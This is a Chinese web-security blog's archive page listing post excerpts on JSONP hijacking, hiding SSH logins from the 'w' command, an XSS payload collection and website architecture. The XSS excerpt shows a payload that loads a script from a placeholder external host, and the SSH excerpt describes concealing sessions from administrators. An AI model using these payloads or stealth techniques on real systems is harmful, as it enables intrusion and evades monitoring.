🌤️ 加载中...
Archive

Web安全与渗透

jsonp跨域劫持姿势

利用场景: 对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用.例如:http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1有ca...
阅读全文

linux隐身登录技巧

方法1:隐藏的远程登录(w 看不到)ssh -T user @ host 登录后执行:/bin/bash -i 然后就可以执行bash命令了,执行w看,登录是空的。方法2:隐藏的远程登录(w 看不到)ssh -o UserKnow...
阅读全文

XSS Playload 集合

更新时间:2017年03月16日javascript:s=document.createElement('script');s.src='http://www.xxx.com/xss.js';document.body.appendC...
阅读全文

大型网站架构过程

1.初级阶段2.应用服务与数据服务分离3.使用缓存改善性能4.使用应用服务器集群改善网站并发处理能力5.数据库读写分离6.使用反向代理和-CDN-加速网站响应7.使用分布式文件系统和分布式数据库系统8.使用-NoSQL-和搜索引擎9....
阅读全文